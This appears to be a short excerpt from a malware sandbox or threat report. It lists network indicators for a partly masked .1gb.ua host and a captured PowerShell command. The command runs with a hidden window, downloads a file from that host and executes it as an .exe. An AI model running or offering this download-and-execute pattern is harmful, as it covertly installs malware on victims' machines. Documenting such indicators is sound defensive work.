Technical Information
- http://go#####ltd-ua.1gb.ua/extension.dat as $d
- 'go#####ltd-ua.1gb.ua':80
- DNS ASK go#####ltd-ua.1gb.ua
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden $d=$env:temp+'\483d2fa8a09000d53c218306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://go#####ltd-ua.1gb.ua/extension.dat',$d);Start-Process $d;[System....' (with hidden window)